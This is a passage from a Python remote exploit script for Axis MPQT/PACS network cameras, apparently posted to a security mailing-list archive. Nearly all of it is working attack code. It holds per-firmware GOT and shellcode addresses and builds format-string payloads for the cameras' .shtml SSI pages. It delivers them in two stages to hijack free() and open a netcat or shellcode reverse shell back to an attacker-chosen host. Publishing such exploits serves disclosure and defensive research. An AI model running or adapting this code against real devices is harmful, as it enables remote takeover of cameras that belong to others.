				3,		# 1st POP's
				13,		# 2nd POP's
				'axi',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# PACS
		'MIPS-1.3x': [
				0x41e4cc,	# Adjust to GOT free() address
				0x420a78,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

		# PACS
		'MIPS-1.1x': [
				0x41e268,	# Adjust to GOT free() address
				0x420818,	# .bss shellcode address
				7,		# 1st POP's
				11,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'MIPSel'	# Shellcode type
		],

#
# Tested with execstack to set executable stack flag bit on bin's and lib's
#
# These two 'Old Style' are not used in the exploit, but kept here as reference as they has been confirmed working.
#

		# ARMel with bin/libs executable stack flag set with 'execstack'
		# MPQT
		'ARM-5.50x': [			# 
				0x1c1b4,	# Adjust to GOT free() address
				0x1e7c8,	# .bss shellcode address
				93,		# 1st POP's
				1,		# 2nd POP's
				'axis',		# Aligns injected code
				700,		# How big buffer before shellcode
				'ARMel'		# Shellcode type (ARMel)
		],

		# ARMel with bin/libs executable stack flag set with 'execstack'
		# MPQT
		'ARM-5.55x': [			# 
				0x1c15c,	# Adjust to GOT free() address
				0x1e834,	# .bss shellcode address
				59,		# 1st POP's
				80,		# 2nd POP's
				'axis',		# Aligns injected code
				800,		# How big buffer before shellcode
				'ARMel'		# Shellcode type (ARMel)
		],

#
# Using direct parameter access format string, AKA 'New Style'
#
		# MPQT
		'ARM-NCSH-5.20x': [		# AXIS P1311 5.20 (id=root)
				0x1c1b4,	# Adjust to GOT free() address
				0x10178,	# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				61,		# 1st POP's
				115,		# 2nd POP's
				143,		# 3rd POP's
				118,		# 4th POP's
				'NCSH2'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.2x': [		# 
				0x1c1b4,	# Adjust to GOT free() address
				0x1013c,	# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				61,		# 1st POP's
				115,		# 2nd POP's
				143,		# 3rd POP's
				118,		# 4th POP's
				'NCSH2'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.4x': [		# 
				0x1c1b4,	# Adjust to GOT free() address
				0x101fc,	# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				61,		# 1st POP's
				115,		# 2nd POP's
				143,		# 3rd POP's
				118,		# 4th POP's
				'NCSH2'		# Shellcode type (Netcat Shell)
		],
#
# Using POP format string, AKA 'Old Style'
#

		# MPQT
		'ARM-NCSH-5.5x': [		# 
				0x1c15c,	# Adjust to GOT free() address
				0xfdcc,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				97,		# 1st POP's
				0,		# 2nd POP's
				41,		# 3rd POP's
				0,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.6x': [		# 
				0x1c15c,	# Adjust to GOT free() address
				0xfcec,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				97,		# 1st POP's
				0,		# 2nd POP's
				41,		# 3rd POP's
				0,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-5.7x': [		# 
				0x1c1c0,	# Adjust to GOT free() address
				0xf800,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				132,		# 1st POP's
				0,		# 2nd POP's
				34,		# 3rd POP's
				0,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# Will go in endless loop after exit of nc shell... DoS sux
		# MPQT
		'ARM-NCSH-5.8x': [		# 
				0x1b39c,	# Adjust to GOT free() address
				0xf8c0,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				98,		# 1st POP's
				0,		# 2nd POP's
				34,		# 3rd POP's
				1,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],

		# MPQT
		'ARM-NCSH-6.1x': [		# 
				0x1d2a4,	# Adjust to GOT free() address
#				0xecc4,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				0xecc8,		# Adjust to "/bin/sh -c; pipe(); vfork(); execve()"
				106,		# 1st POP's
				0,		# 2nd POP's
				34,		# 3rd POP's
				1,		# 4th POP's
				'NCSH1'		# Shellcode type (Netcat Shell)
		],
#
# Using POP format string, AKA 'Old Style'
#

		# MPQT
		'CRISv32-5.5x': [		# 
				0x8d148,	# Adjust to GOT free() address
				0x8f5a8,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		# MPQT
		'CRISv32-5.4x': [		# 
				0x8d0e0,	# Adjust to GOT free() address
				0x8f542,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		# MPQT
		'CRISv32-5.2x': [		# 
				0x8d0b4,	# Adjust to GOT free() address
				0x8f4d6,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		],

		# MPQT
		'CRISv32-5.20.0': [		# 
				0x8d0e4,	# Adjust to GOT free() address
				0x8f546,	# .bss shellcode address
				4,		# 1st POP's
				13,		# 2nd POP's
				'axis',		# Aligns injected code
				470,		# How big buffer before shellcode
				'CRISv32'	# Shellcode type (Crisv32)
		]


	}

		if self.target == 0:
			return target_db
			
		if not self.target in target_db:
			print "[!] Unknown FMS key: %s!" % self.target
			sys.exit(1)
	
		if self.verbose:
			print "[Verbose] Number of availible FMS keys:",len(target_db)

		return target_db


#
# Validate correctness of HOST, IP and PORT
#
class Validate:

	def __init__(self,verbose):
		self.verbose = verbose

	# Check if IP is valid
	def CheckIP(self,IP):
		self.IP = IP

		ip = self.IP.split('.')
		if len(ip) != 4:
			return False
		for tmp in ip:
			if not tmp.isdigit():
				return False
		i = int(tmp)
		if i < 0 or i > 255:
			return False
		return True

	# Check if PORT is valid
	def Port(self,PORT):
		self.PORT = PORT

		if int(self.PORT) < 1 or int(self.PORT) > 65535:
			return False
		else:
			return True

	# Check if HOST is valid
	def Host(self,HOST):
		self.HOST = HOST

		try:
			# Check valid IP
			socket.inet_aton(self.HOST) # Will generate exeption if we try with FQDN or invalid IP
			# Or we check again if it is correct typed IP
			if self.CheckIP(self.HOST):
				return self.HOST
			else:
				return False
		except socket.error as e:
			# Else check valid DNS name, and use the IP address
			try:
				self.HOST = socket.gethostbyname(self.HOST)
				return self.HOST
			except socket.error as e:
				return False



if __name__ == '__main__':

#
# Help, info and pre-defined values
#	
	INFO = '[Axis Communications MPQT/PACS remote exploit 2016 bashis <mcw noemail eu>]'
	HTTP = "http"
	HTTPS = "https"
	proto = HTTP
	verbose = False
	noexploit = False
	lhost = '192.168.0.1'	# Default Local HOST
	lport = '31337'		# Default Local PORT
	rhost = '192.168.0.90'	# Default Remote HOST
	rport = '80'		# Default Remote PORT
	#  Not needed for the SSI exploit, here for possible future usage.
#	creds = 'root:pass'
	creds = False

#
# Try to parse all arguments
#
	try:
		arg_parser = argparse.ArgumentParser(
#		prog=sys.argv[0],
		prog='axis-ssid-PoC.py',
                description=('[*]' + INFO + '\n'))
		arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
		arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
		arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
		arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
		arg_parser.add_argument('--fms', required=False, help='Manual FMS key')
		if creds:
			arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
		arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
		arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
		arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
		arg_parser.add_argument('--dict', required=False, default=False, action='store_true', help='Print FMS keys and stats from dictionary, additional details with --verbose')
		args = arg_parser.parse_args()
	except Exception as e:
		print INFO,"\nError: %s\n" % str(e)
		sys.exit(1)

	# We want at least one argument, so print out help
	if len(sys.argv) == 1:
		arg_parser.parse_args(['-h'])

	print "\n[*]",INFO

	if args.verbose:
		verbose = args.verbose

	# Print out info from dictionary
	if args.dict:
		target = FMSdb(rhost,verbose).FMSkey(0)
		print "[db] Number of FMS keys:",len(target)

		# Print out detailed info from dictionary
		if verbose:

			print "[db] Target details of FMS Keys availible for manual xploiting"
			print "\n[FMS Key]\t[GOT Address]\t[BinSh Address]\t[POP1]\t[POP2]\t[POP3]\t[POP4]\t[Shellcode]"

			for tmp in range(0,len(target)):
				Key = sorted(target.keys())[tmp]
				temp = re.split('[-]',Key)[0:10]

				if temp[1] == 'NCSH':
					print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',target[Key][4],'\t',target[Key][5],'\t',target[Key][6]

			print "\n[FMS Key]\t[GOT Address]\t[BSS Address]\t[POP1]\t[POP2]\t[Align]\t[Buf]\t[Shellcode]"
			for tmp in range(0,len(target)):
				Key = sorted(target.keys())[tmp]
				temp = re.split('[-]',Key)[0:10]

				if temp[1] != 'NCSH':
					print Key,'\t','0x{:08x}'.format(target[Key][0]),'\t','0x{:08x}'.format(target[Key][1]),'\t',target[Key][2],'\t',target[Key][3],'\t',len(target[Key][4]),'\t',target[Key][5],'\t',target[Key][6]

			print "\n"
		else:
			print "[db] Target FMS Keys availible for manual xploiting instead of using auto mode:"
			Key = ""
			for tmp in range(0,len(target)):
				Key += sorted(target.keys())[tmp]
				Key += ', '
			print '\n',Key,'\n'
		sys.exit(0)

#
# Check validity, update if needed, of provided options
#
	if args.https:
		proto = HTTPS
		if not args.rport:
			rport = '443'

	if creds and args.auth:
		creds = args.auth

	if args.noexploit:
		noexploit = args.noexploit

	if args.rport:
		rport = args.rport

	if args.rhost:
		rhost = args.rhost

	if args.lport:
		lport = args.lport

	if args.lhost:
		lhost = args.lhost

	# Check if LPORT is valid
	if not Validate(verbose).Port(lport):
		print "[!] Invalid LPORT - Choose between 1 and 65535"
		sys.exit(1)

	# Check if RPORT is valid
	if not Validate(verbose).Port(rport):
		print "[!] Invalid RPORT - Choose between 1 and 65535"
		sys.exit(1)

	# Check if LHOST is valid IP or FQDN, get IP back
	lhost = Validate(verbose).Host(lhost)
	if not lhost:
		print "[!] Invalid LHOST"
		sys.exit(1)

	# Check if RHOST is valid IP or FQDN, get IP back
	rhost = Validate(verbose).Host(rhost)
	if not rhost:
		print "[!] Invalid RHOST"
		sys.exit(1)


#
# Validation done, start print out stuff to the user
#
	if noexploit:
		print "[i] Test mode selected, no exploiting..."
	if args.https:
		print "[i] HTTPS / SSL Mode Selected"
	print "[i] Remote target IP:",rhost
	print "[i] Remote target PORT:",rport
	print "[i] Connect back IP:",lhost
	print "[i] Connect back PORT:",lport

	rhost = rhost + ':' + rport

#
# FMS key is required into this PoC
#
	if not args.fms:
		print "[!] FMS key is required!"
		sys.exit(1)
	else:
		Key = args.fms
		print "[i] Trying with FMS key:",Key

#
# Prepare exploiting
#
	# Look up the FMS key in dictionary and return pointer for FMS details to use
	target = FMSdb(rhost,verbose).FMSkey(Key)

	if target[Key][6] == 'NCSH1':
		NCSH1 = target[Key][6]
		NCSH2 = ""
	elif target[Key][6] == 'NCSH2':
		NCSH2 = target[Key][6]
		NCSH1 = ""
	else:
		NCSH1 = ""
		NCSH2 = ""
	
	if Key == 'ARM-NCSH-5.8x':
		print "\nExploit working, but will end up in endless loop after exiting remote NCSH\nDoS sux, so I'm exiting before that shit....\n\n"
		sys.exit(0)

	print "[i] Preparing shellcode:",str(target[Key][6])

	# We don't use url encoded shellcode with Netcat shell
	# This is for MIPS/CRISv32 and ARM shellcode
	if not NCSH1 and not NCSH2:
		FMSdata = target[Key][4]		# This entry aligns the injected shellcode

		# Building up the url encoded shellcode for sending to the target,
		# and replacing LHOST / LPORT in shellcode to choosen values
		
		# part of first 500 decoded bytes will be overwritten during stage #2, and since
		# there is different 'tailing' on the request internally, keep it little more than needed, to be safe.
		# Let it be 0x00, just for fun.
		FMSdata += '%00' * target[Key][5]

		# Connect back IP to url encoded
		ip_hex = '%{:02x} %{:02x} %{:02x} %{:02x}'.format(*map(int, lhost.split('.')))
		ip_hex = ip_hex.split()
		IP1=ip_hex[0];IP2=ip_hex[1];IP3=ip_hex[2];IP4=ip_hex[3];

		# Let's break apart the hex code of LPORT into two bytes
		port_hex = hex(int(lport))[2:]
		port_hex = port_hex.zfill(len(port_hex) + len(port_hex) % 2)
		port_hex = ' '.join(port_hex[i: i+2] for i in range(0, len(port_hex), 2))
		port_hex = port_hex.split()
	
		if (target[Key][6]) == 'MIPSel':
			# Connect back PORT
			if len(port_hex) == 1:
				PP1 = "%ff"
				PP0 = '%{:02x}'.format((int(port_hex[0],16)-1))
			elif len(port_hex) == 2:
				# Little Endian
				PP1 = '%{:02x}'.format((int(port_hex[0],16)-1))
				PP0 = '%{:02x}'.format(int(port_hex[1],16))
		elif (target[Key][6]) == 'ARMel': # Could be combinded with CRISv32
			# Connect back PORT
			if len(port_hex) == 1:
				PP1 = "%00"
				PP0 = '%{:02x}'.format(int(port_hex[0],16))
			elif len(port_hex) == 2:
				# Little Endian
				PP1 = '%{:02x}'.format(int(port_hex[0],16))
				PP0 = '%{:02x}'.format(int(port_hex[1],16))
		elif (target[Key][6]) == 'CRISv32':
			# Connect back PORT
			if len(port_hex) == 1:
				PP1 = "%00"
				PP0 = '%{:02x}'.format(int(port_hex[0],16))
			elif len(port_hex) == 2:
				# Little Endian
				PP1 = '%{:02x}'.format(int(port_hex[0],16))
				PP0 = '%{:02x}'.format(int(port_hex[1],16))
		else:
			print "[!] Unknown shellcode! (%s)" % str(target[Key][6])
			sys.exit(1)

		# Replace LHOST / LPORT in URL encoded shellcode
		shell = shellcode_db(rhost,verbose).sc(target[Key][6])
		shell = shell.replace("IP1",IP1)
		shell = shell.replace("IP2",IP2)
		shell = shell.replace("IP3",IP3)
		shell = shell.replace("IP4",IP4)
		shell = shell.replace("PP0",PP0)
		shell = shell.replace("PP1",PP1)
		FMSdata += shell

#
# Calculate the FMS values to be used
#
	# Get pre-defined values
	ALREADY_WRITTEN = 40	# Already 'written' in the daemon before our FMS
#	POP_SIZE = 8
	POP_SIZE = 1

	GOThex = target[Key][0]
	BSShex = target[Key][1]
	GOTint = int(GOThex)

	# 'One-Write-Where-And-What'
	if not NCSH1 and not NCSH2:

		POP1 = target[Key][2]
		POP2 = target[Key][3]

		# Calculate for creating the FMS code
		ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
		GOTint = (GOTint - ALREADY_WRITTEN)
	
		ALREADY_WRITTEN = ALREADY_WRITTEN + (POP2 * POP_SIZE)

		BSSint = int(BSShex)
		BSSint = (BSSint - GOTint - ALREADY_WRITTEN)

#		if verbose:
#			print "[Verbose] Calculated GOTint:",GOTint,"Calculated BSSint:",BSSint

	# 'Two-Write-Where-And-What' using "New Style"
	elif NCSH2:

		POP1 = target[Key][2]
		POP2 = target[Key][3]
		POP3 = target[Key][4]
		POP4 = target[Key][5]
 		POP2_SIZE = 2
		
 		# We need to count higher than provided address for the jump
		BaseAddr = 0x10000 + BSShex
	
		# Calculate for creating the FMS code
		GOTint = (GOTint - ALREADY_WRITTEN)

		ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint
		
		# Calculate FirstWhat value
		FirstWhat = BaseAddr - (ALREADY_WRITTEN)
		
		ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat

		# Calculate SecondWhat value, so it always is 0x20300
		SecondWhat = 0x20300 - (ALREADY_WRITTEN + POP2_SIZE)

		shell = shellcode_db(rhost,verbose).sc(target[Key][6])
		shell = shell.replace("LHOST",lhost)
		shell = shell.replace("LPORT",lport)

		FirstWhat = FirstWhat - len(shell)

#		if verbose:
#			print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
	
	
	# 'Two-Write-Where-And-What' using "Old Style"
	elif NCSH1:

		POP1 = target[Key][2]
		POP2 = target[Key][3]
		POP3 = target[Key][4]
		POP4 = target[Key][5]
		POP2_SIZE = 2

		# FirstWhat writes with 4 bytes (Y) (0x0002YYYY)
		# SecondWhat writes with 1 byte (Z) (0x00ZZYYYY)
		if BSShex > 0x10000:
			MSB = 1
		else:
			MSB = 0

 		# We need to count higher than provided address for the jump
		BaseAddr = 0x10000 + BSShex

		# Calculate for creating the FMS code
		ALREADY_WRITTEN = ALREADY_WRITTEN + (POP1 * POP_SIZE)
		
		GOTint = (GOTint - ALREADY_WRITTEN)
		
		ALREADY_WRITTEN = ALREADY_WRITTEN + GOTint + POP2_SIZE + (POP3 * POP_SIZE)
		
		# Calculate FirstWhat value
		FirstWhat = BaseAddr - (ALREADY_WRITTEN)
		
		ALREADY_WRITTEN = ALREADY_WRITTEN + FirstWhat + (POP4 * POP_SIZE)

		# Calculate SecondWhat value, so it always is 0x203[00] or [01]
		SecondWhat = 0x20300 - (ALREADY_WRITTEN) + MSB

		shell = shellcode_db(rhost,verbose).sc(target[Key][6])
		shell = shell.replace("LHOST",lhost)
		shell = shell.replace("LPORT",lport)

		GOTint = GOTint - len(shell)

#		if verbose:
#			print "[Verbose] Calculated GOTint:",GOTint,"Calculated FirstWhat:",FirstWhat,"Calculated SecondWhat:",SecondWhat
	
	else:
		print "[!] NCSH missing, exiting"
		sys.exit(1)
#
# Let's start the exploiting procedure
#

#
# Stage one
#
	if NCSH1 or NCSH2:

		# "New Style" needs to make the exploit in two stages
		if NCSH2:
			FMScode = do_FMS(rhost,verbose)
			# Writing 'FirstWhere' and 'SecondWhere'
			# 1st request
			FMScode.AddADDR(GOTint) # Run up to free() GOT address
			#
			# 1st and 2nd "Write-Where"
			FMScode.AddDirectParameterN(POP1)	# Write 1st Where
			FMScode.Add("XX")			# Jump up two bytes for next address
			FMScode.AddDirectParameterN(POP2)	# Write 2nd Where
			FMSdata = FMScode.FMSbuild()
		else:
			FMSdata = ""

		print "[>] StG_1: Preparing netcat connect back shell to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))
	else:
		print "[>] StG_1: Sending and decoding shellcode to address:",'0x{:08x}'.format(BSShex),"(%d bytes)" % (len(FMSdata))

	# Inject our encoded shellcode to be decoded in MIPS/CRISv32/ARM
	# Actually, any valid and public readable .shtml file will work...
	# (One of the two below seems always to be usable)
	#
	# For NCSH1 shell, we only check if the remote file are readable, for usage in Stage two
	# For NCSH2, 1st and 2nd (Write-Where) FMS comes here, and calculations start after '=' in the url
	#
	try:
		target_url = "/httpDisabled.shtml?user_agent="
		if noexploit:
			target_url2 = target_url
		else:
			target_url2 = "/httpDisabled.shtml?&http_user="

		if NCSH2:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
		else:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
	except urllib2.HTTPError as e:
		if e.code == 404:
			print "[<] Error",e.code,e.reason
			target_url = "/view/viewer_index.shtml?user_agent="
			if noexploit:
				target_url2 = target_url
			else:
				target_url2 = "/view/viewer_index.shtml?&http_user="
			print "[>] Using alternative target shtml"
			if NCSH2:
				html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
			else:
				html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url + FMSdata)
	except Exception as e:
		if not NCSH2:
			print "[!] Shellcode delivery failed:",str(e)
			sys.exit(1)
#
# Stage two
#

#
# Building and sending the FMS code to the target
#
	print "[i] Building the FMS code..."

	FMScode = do_FMS(rhost,verbose)

	# This is an 'One-Write-Where-And-What' for FMS
	#
	# Stack Example:
	#
	# Stack content	|	Stack address (ASLR)
	#
	# 0x0		|	@0x7e818dbc -> [POP1's]
	# 0x0		|	@0x7e818dc0 -> [free () GOT address]
	# 0x7e818dd0	|	@0x7e818dc4>>>>>+ "Write-Where" (%n)
	# 0x76f41fb8	|	@0x7e818dc8     | -> [POP2's]
	# 0x76f3d70c	|	@0x7e818dcc     | -> [BSS shell code address]
	# 0x76f55ab8	|	@0x7e818dd0<<<<<+ "Write-What" (%n)
	# 0x1		|	@0x7e818dd4
	#
	if not NCSH1 and not NCSH2:
		FMScode.AddPOP(POP1)		# 1st serie of 'Old Style' POP's 
		FMScode.AddADDR(GOTint)		# GOT Address
		FMScode.AddWRITEn(1)		# 4 bytes Write-Where
#		FMScode.AddWRITElln(1)		# Easier to locate while debugging as this will write double word (0x00000000004xxxxx)

		FMScode.AddPOP(POP2)		# 2nd serie of 'Old Style' POP's
		FMScode.AddADDR(BSSint)		# BSS shellcode address
		FMScode.AddWRITEn(1)		# 4 bytes Write-What
#		FMScode.AddWRITElln(1)		# Easier to locate while debugging as this will write double word (0x00000000004xxxxx)

	# End of 'One-Write-Where-And-What'


	# This is an 'Two-Write-Where-And-What' for FMS
	#
	# Netcat shell and FMS code in same request, we will jump to the SSI function <!--#exec cmd="xxx" -->
	# We jump over all SSI tagging to end up directly where "xxx" will
	# be the string passed on to SSI exec function ('/bin/sh -c', pipe(), vfork() and execv())
	#
	# The Trick here is to write lower target address, that we will jump to when calling free(),
	# than the FMS has counted up to, by using Two-Write-Where-and-What with two writes to free() GOT
	# address with two LSB writes.
	#
	elif NCSH2:
		#
		# Direct parameter access for FMS exploitation are really nice and easy to use.
		# However, we need to exploit in two stages with two requests.
		# (I was trying to avoid this "Two-Stages" so much as possibly in this exploit developement...)
		#
		# 1. Write "Two-Write-Where", where 2nd is two bytes higher than 1st (this allows us to write to MSB and LSB)
		# 2. Write with "Two-Write-What", where 1st (LSB) and 2nd (MSB) "Write-Where" pointing to.
		# 
		# With "new style", we can write with POPs independently as we don't depended of same criteria as in "NCSH1",
		# we can use any regular "Stack-to-Stack" pointer as we can freely choose the POP-and-Write.
		# [Note the POP1/POP2 (low-high) vs POP3/POP4 (high-low) difference.]
		#
		# Stack Example:
		#
		# Stack content	|	Stack address (ASLR)
		#
		# 0x7e818dd0	|	@0x7e818dc4>>>>>+ 1st "Write-Where" [@Stage One]
		# 0x76f41fb8	|	@0x7e818dc8     |
		# 0x76f3d70c	|	@0x7e818dcc     |
		# 0x76f55ab8	|	@0x7e818dd0<<<<<+ 1st "Write-What" [@Stage Two]
		# 0x1		|	@0x7e818dd4
		# [....]
		# 0x1c154	|	@0x7e818e10
		# 0x7e818e20	|	@0x7e818e14>>>>>+ 2nd "Write-Where" [@Stage One]
		# 0x76f41fb8	|	@0x7e818e18     |
		# 0x76f3d70c	|	@0x7e818e1c     |
		# 0x76f55758	|	@0x7e818e20<<<<<+ 2nd "Write-What" [@Stage Two]
		# 0x1		|	@0x7e818e24
		#

		FMScode.Add(shell)

		#
		# 1st and 2nd "Write-Where" already done in stage one
		#
		# 1st and 2nd "Write-What"
		#
		FMScode.AddADDR(GOTint + FirstWhat)	# Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
		FMScode.AddDirectParameterN(POP3)	# Write with 4 bytes (we want to zero out in MSB)
		FMScode.AddADDR(SecondWhat + 3)		# Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
		FMScode.AddDirectParameterHHN(POP4)	# Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation

	elif NCSH1:
		# Could use direct argument addressing here, but I like to keep "old style" as well,
		# as it's another interesting concept.
		#
		# Two matching stack contents -> stack address in row w/o or max two POP's between,
		# is needed to write two bytes higher (MSB).
		# 
		#
		# Stack Example:
		#
		# Stack Content	|	@Stack Address (ASLR)
		#
		# 0x9c		|	@7ef2fde8 -> [POP1's]
		# [....]
		# 0x1		|	@7ef2fdec -> [GOTint address]
		#------
		# 0x7ef2fe84	|	@7ef2fdf0 >>>>>+     Write 'FirstWhere' (%n) [LSB]
		#                       -> 'XX'        |     two bytes (Can be one or two POP's as well, by using %2c or %1c%1c as POPer)
		# 0x7ef2fe8c	|	@7ef2fdf4 >>>>>>>>>+ Write 'SecondWhere' (%n) [MSB]
		# ------                               |   |
		# [....]                -> [POP3's]    |   |
		# 0x7fb99dc	|	@7ef2fe7c      |   |
		# 0x7ef2fe84	|	@7ef2fe80      |   | [Count up to 0x2XXXX]
		# 0x7ef2ff6a	|	@7ef2fe84 <<<<<+   | Write 'XXXX' 'FirstWhat' (%n) (0x0002XXXX))
		#                       -> [POP4's]        |
		# (nil)		|	@7ef2fe88          | [Count up to 0x20300]
		# 0x7ef2ff74	|	@7ef2fe8c <<<<<<<<<+ Write 'ZZ' 'SecondWhat' (%hhn) (0x00ZZXXXX)

		FMScode.Add(shell)

		# Write FirstWhere for 'FirstWhat'
		FMScode.AddPOP(POP1)
		FMScode.AddADDR(GOTint) # Run up to free() GOT address
		FMScode.AddWRITEn(1)

		# Write SecondWhere for 'SecondWhat'
		#
		# This is special POP with 1 byte, we can maximum POP 2!
		#
		# This POP sequence is actually no longer used in this part of exploit, was developed to meet the requirement
		# for exploitation of 5.2.x and 5.40.x, as there needed to be one POP with maximum of two bytes.
		# Kept as reference as we now using direct parameter access AKA 'New Style" for 5.2x/5.4x
		#
		if POP2 != 0:
			# We only want to write 'SecondWhat' two bytes higher at free() GOT
			if POP2 > 2:
				print "POP2 can't be greater than two!"
				sys.exit(1)
			if POP2 == 1:
				FMScode.Add("%2c")
			else:
				FMScode.Add("%1c%1c")
		else:
			FMScode.Add("XX")
		FMScode.AddWRITEn(1)

		# Write FirstWhat pointed by FirstWhere
		FMScode.AddPOP(POP3)		# Old Style POP's
		FMScode.AddADDR(FirstWhat)	# Run up to 0x0002XXXX, write with LSB (0xXXXX) to LSB in target address.
		FMScode.AddWRITEn(1)		# Write with 4 bytes (we want to zero out in MSB)
		
		# Write SecondWhat pointed by SecondWhere
		FMScode.AddPOP(POP4)		# Old Style POP's
		FMScode.AddADDR(SecondWhat)	# Run up to 0x00020300, write with LSB (0xZZ) to lower part of MSB. (0x00ZZXXXX)
		FMScode.AddWRITEhhn(1)		# Write with one byte 0x000203[00] or 0x000203[01] depending from above calculation

	else:
		sys.exit(1)

	FMSdata = FMScode.FMSbuild()

	print "[>] StG_2: Writing shellcode address to free() GOT address:",'0x{:08x}'.format(GOThex),"(%d bytes)" % (len(FMSdata))

	# FMS comes here, and calculations start after '=' in the url
	try:
		if NCSH1 or NCSH2:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).RAW(target_url2 + FMSdata) # Netcat shell
		else:
			html = HTTPconnect(rhost,proto,verbose,creds,noexploit).Send(target_url2 + FMSdata) # MIPS/CRIS shellcode
	except urllib2.HTTPError as e:
		print "[!] Payload delivery failed:",str(e)
		sys.exit(1)
	except Exception as e:
		# 1st string returned by HTTP mode, 2nd by HTTPS mode
		if str(e) == "timed out" or str(e) == "('The read operation timed out',)":
			print "[i] Timeout! Payload delivered sucessfully!"
		else:
			print "[!] Payload delivery failed:",str(e)
			sys.exit(1)

	if noexploit:
		print "\n[*] Not exploiting, no shell...\n"
	else:
		print "\n[*] All done, enjoy the shell...\n"

#
# [EOF]
#






[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux